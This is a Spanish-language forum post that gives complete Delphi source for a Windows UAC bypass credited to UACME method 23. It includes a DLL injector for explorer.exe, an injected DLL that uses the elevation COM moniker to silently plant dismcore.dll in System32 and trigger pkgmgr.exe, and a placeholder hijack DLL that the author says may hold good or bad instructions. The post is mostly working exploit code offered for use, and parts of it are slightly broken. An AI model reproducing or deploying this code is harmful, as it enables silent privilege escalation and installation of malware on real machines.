bypass uac pkgmgr.exe
Publicado: 14 Jul 2017, 09:42
por joselin
creditos
metodo 23 de uacme
[Enlace externo eliminado para invitados]
y
[Enlace externo eliminado para invitados]
el programa que inyecta la dll en explorer
tiene 2 botones uno inyecta la dll y otro la descuelga del proceso
la dll a inyectar
copia la dll maligna final que va a ser cargada
por dism.exe
la hijack dll
la dll dismcore.dll que puede contener instrucciones buenas o malas
metodo 23 de uacme
[Enlace externo eliminado para invitados]
y
[Enlace externo eliminado para invitados]
el programa que inyecta la dll en explorer
tiene 2 botones uno inyecta la dll y otro la descuelga del proceso
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls,tlhelp32,psapi,SWSystem;
type
TForm1 = class(TForm)
Button1: TButton;
Button2: TButton;
Button3: TButton;
Button4: TButton;
Button5: TButton;
Button6: TButton;
procedure Button1Click(Sender: TObject);
procedure Button2Click(Sender: TObject);
procedure Button5Click(Sender: TObject);
procedure Button6Click(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
ModuleHandle: DWORD;
implementation
{$R *.dfm}
function EnablePrivilege(PrivilegeName: PChar; Enable: Boolean): Boolean;
var
hToken: THandle;
Tp: TOKEN_PRIVILEGES;
Luid: TLargeInteger;
begin
Result:= FALSE;
if OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES or
TOKEN_QUERY or TOKEN_READ, hToken) then
if LookupPrivilegeValue(nil,PrivilegeName,Luid) then
begin
Tp.PrivilegeCount:= 1;
Tp.Privileges[0].Luid:= Luid;
if Enable then
Tp.Privileges[0].Attributes:= SE_PRIVILEGE_ENABLED
else
Tp.Privileges[0].Attributes:= 0;
Result:= AdjustTokenPrivileges(hToken,FALSE,Tp,0,nil,PDWORD(nil)^);
CloseHandle(hToken);
end;
end;
function GetPID(ProcessName: string): DWORD;
var MyHandle: THandle;
Struct: TProcessEntry32;
begin
Result:=0;
try
MyHandle:=CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS, 0);
Struct.dwSize:=Sizeof(TProcessEntry32);
if Process32First(MyHandle, Struct) then
if Struct.szExeFile=ProcessName then
begin
Result:=Struct.th32ProcessID;
Exit;
end;
while Process32Next(MyHandle, Struct) do
if Struct.szExeFile=ProcessName then
begin
Result:=Struct.th32ProcessID;
Exit;
end;
except on exception do
Exit;
end;
end;
procedure InjectDll(TargetProcessID : DWORD; dllName : pansichar);
var
LibName : pointer;
hProcess , ThreadHandle : Thandle;
begin
if ModuleHandle = 0 then
if EnablePrivilege('SeDebugPrivilege', TRUE) then
begin
hProcess := OpenProcess( PROCESS_ALL_ACCESS, FALSE, TargetProcessID );
if (hProcess = 0) then exit;
// alocate and write the dll name to the remote process
LibName := VirtualAllocEx(hProcess , 0, strlen(dllName) + 1 , MEM_COMMIT , PAGE_READWRITE) ;//estaba con+5?
//LibName := VirtualAllocEx(hProcess , 0, Length(dllName) + 1 , MEM_COMMIT , PAGE_READWRITE) ;//estaba con+5?
if ( LibName <> nil) then
begin
WriteProcessMemory(hProcess , LibName, (dllName) , strlen(dllName) , PDWORD(nil)^);
end ;
ThreadHandle := CreateRemoteThread( hProcess , nil , 0, GetProcAddress(GetModuleHandle('kernel32.dll'), 'LoadLibraryA') , LibName ,0 , PDWORD(nil)^);
if ThreadHandle <> 0then begin
WaitForSingleObject( ThreadHandle , INFINITE); //wait for the thread to execute
GetExitCodeThread(ThreadHandle,ModuleHandle);
CloseHandle(ThreadHandle);
// free the memory we allocated for the dll name
if VirtualFreeEx( hProcess , LibName ,Length(dllName)+1 , MEM_RELEASE)<> nil then
CloseHandle(hProcess);
end;
end;
EnablePrivilege('SeDebugPrivilege', FALSE);
end;
//descolgar dll
procedure desload(TargetProcessID : DWORD);//(dllName : string): boolean;
var
hProcess , ThreadHandle : Thandle;
begin
if ModuleHandle <> 0 then
if EnablePrivilege('SeDebugPrivilege', TRUE) then
begin
hProcess := OpenProcess( PROCESS_ALL_ACCESS, FALSE, TargetProcessID );
if hProcess <> 0 then
begin
ThreadHandle := CreateRemoteThread(hProcess, nil, 0,GetProcAddress(GetModuleHandle('Kernel32'),'FreeLibrary'),Pointer(ModuleHandle), 0, PDWORD(nil)^);
if ThreadHandle <> 0 then begin
WaitForSingleObject( ThreadHandle , INFINITE); //wait for the thread to execute
closehandle( ThreadHandle );
ModuleHandle:= 0;
CloseHandle(hprocess);
end;
end;
end;
EnablePrivilege('SeDebugPrivilege', FALSE);
end;
procedure TForm1.Button1Click(Sender: TObject);
var
pid:dword;
s:string;
begin
pid:=getpid('explorer.exe');
InjectDll(pid,pansichar(ansistring(gsAppPath)+'uac.dll')) ;
end;
procedure TForm1.Button2Click(Sender: TObject);
var
pid:dword;
begin
pid:=getpid('explorer.exe');
desload(pid);
end;
la dll a inyectar
copia la dll maligna final que va a ser cargada
por dism.exe
library Project1;
uses
SysUtils,
ShlObj,
shellapi,
ActiveX,
dialogs,
windows,
Classes;
{$R *.res}
type
PBindOpts3 = ^TBindOpts3;
{$EXTERNALSYM tagBIND_OPTS3}
tagBIND_OPTS3 = record
cbStruct: DWORD;
grfFlags: DWORD;
grfMode: DWORD;
dwTickCountDeadline: DWORD;
dwTrackFlags: DWORD;
dwClassContext: DWORD;
locale: LCID;
pServerInfo: Pointer;
hwnd: hwnd;
end;
TBindOpts3 = tagBIND_OPTS3;
{$EXTERNALSYM BIND_OPTS3}
BIND_OPTS3 = TBindOpts3;
VAR
pFileOp : IFileOperation;
pSHISource : IShellItem;
pSHIDestination : IShellItem;
pSHIDelete : IShellItem;
szEIFOMoniker :widestring;
pIID_EIFO : TGUID;
pIID_ShellItem : TGUID;
pIID_ShellItem2 : TGUID;
bo : TBindOpts3;
//**************************************************
FUNCTION DELETEFIL (SZELEVDLLFULL:STRING):HRESULT;
begin
IF (CoInitialize (NIL) <> S_OK) then
bo.cbStruct := SizeOf(BIND_OPTS3);
bo.dwClassContext := CLSCTX_LOCAL_SERVER;
szEIFOMoniker := ('ELEVATION:ADMINISTRATOR!NEW:{3AD05575-8857-4850-9277-11B85BDB8E09}');
pIID_EIFO := iFileOperation;
pIID_ShellItem2 := iShellItem2;
IF (CoGetObject (pwidestring(szEIFOMoniker),@bo, pIID_EIFO, @pFileOP) = S_OK) AND
(pFileOp <> NIL) AND
(pFileOp.SetOperationFlags (FOF_NOCONFIRMATION OR FOF_SILENT OR FOFX_SHOWELEVATIONPROMPT OR
FOFX_NOCOPYHOOKS OR FOFX_REQUIREELEVATION OR FOF_NOERRORUI) = S_OK) AND
(SHCreateItemFromParsingName(pwidechar(szElevDllFull), Nil, IID_iShellItem,pSHIDelete)=S_OK) THEN
IF ( pFileOp.DeleteItem(pSHIDelete, NIL)= S_OK) THEN
IF (pFileOp.PerformOperations = S_OK) then
begin
end;
CoUninitialize;
result:=0;
end;
//********************************************************
FUNCTION COPYFIL (SZSOURCEDLL,SZELEVDIR:STRING):HRESULT;
begin
IF (CoInitialize (NIL) <> S_OK) then
bo.cbStruct := SizeOf(BIND_OPTS3);
bo.dwClassContext := CLSCTX_LOCAL_SERVER;
szEIFOMoniker := ('ELEVATION:ADMINISTRATOR!NEW:{3AD05575-8857-4850-9277-11B85BDB8E09}');
pIID_EIFO := iFileOperation;
pIID_ShellItem := iShellItem;
IF (CoGetObject (pwidestring(szEIFOMoniker),@bo, pIID_EIFO, @pFileOP) = S_OK) AND
(pFileOp <> NIL) AND
(pFileOp.SetOperationFlags (FOF_NOCONFIRMATION OR FOF_SILENT OR FOFX_SHOWELEVATIONPROMPT OR
FOFX_NOCOPYHOOKS OR FOFX_REQUIREELEVATION OR FOF_NOERRORUI) = S_OK) AND
(SHCreateItemFromParsingName(pwidechar(szSourceDll), NIL, pIID_ShellItem, pSHISource) = S_OK) AND
(pSHISource <> NIL) AND
(SHCreateItemFromParsingName(pwidechar(szElevDir), NIL, pIID_ShellItem, pSHIDestination) = S_OK)
AND
(pSHIDestination <> NIL) AND
(pFileOp.CopyItem(pSHISource, pSHIDestination, nil, NIL) = S_OK) AND
(pFileOp.PerformOperations = S_OK) then
begin
end;
CoUninitialize;
result:=0;
end;
//**********************************************************************************
FUNCTION EXECANDWAIT(FILENAME,param,DIR:string): BOOLEAN;
VAR
Shinfo: SHELLEXECUTEINFO;
ExitCode:DWORD;
begin
FillChar(ShInfo, SizeOf(ShInfo), 0);
Shinfo.cbSize := sizeof(SHELLEXECUTEINFO);
Shinfo.fMask := SEE_MASK_NOCLOSEPROCESS; //SEE_MASK_NO_CONSOLE:
Shinfo.lpFile := PwideChar(Filename);
Shinfo.lpParameters :=(pwidechar(param));//nil;//PANSICHAR(ANSISTRING(PARAMS));
Shinfo.lpDirectory := pwidechar(dir);//PCHAR(EXTRACTFILEDIR(FILENAME));
Shinfo.nShow :=sw_show;
ShellExecuteEx(@Shinfo);
TRY
repeat
ExitCode := WaitForSingleObject(SHInfo.hProcess,INFINITE);
until (ExitCode <> WAIT_TIMEOUT);
result:=TRUE;
FINALLY
end;
end;
procedure DllMain(reason: integer);
begin
case reason of
DLL_PROCESS_ATTACH:
begin
COPYFIL(GetEnvironmentVariable('TEMP') +'\dismcore.dll','c:\windows\system32\');
if fileexists('c:\windows\system32\dismcore.dll' )then
//manifiesto xml puesto a mano en la carpeta temp necesario para la instalacion desatendida o algo asi
s:='"'+(GetEnvironmentVariable('TEMP') +'\mani.xml"');
EXECANDWAIT('pkgmgr.exe','/n:s ','c:\windows\system32\');
DELETEFIL ('c:\windows\system32\dismcore.dll');
end;
DLL_PROCESS_DETACH:
begin
showmessage('al cerrarse el proceso inyectado'+ #10#13 + ' unload la dll');
//DLL unloading...
end;
DLL_THREAD_ATTACH:
begin
end;
DLL_THREAD_DETACH:
begin
end;
end;
end; (*DllMain*)
begin
DllProc := @DllMain;
DllProc(DLL_PROCESS_ATTACH) ;
end.
la dll dismcore.dll que puede contener instrucciones buenas o malas
Windows,dialogs;
procedure EntryPoint(Reason: dword); stdcall;
begin
if Reason = DLL_PROCESS_ATTACH then
begin
MessageBox(0, 'haaa pillin sos muy malote !!!', 'susesfuly pelotudo', 0);
//no se por que pero si no coloco exitproces termina con error com
ExitProcess(exitcode);
end;
if Reason = DLL_THREAD_ATTACH then
begin
end;
if Reason =DLL_THREAD_DETACH then
begin
end;
if Reason = DLL_PROCESS_DETACH then
begin
end;
end;
(*DllMain*)
begin
DLLProc := @EntryPoint;
EntryPoint(DLL_PROCESS_ATTACH);
end.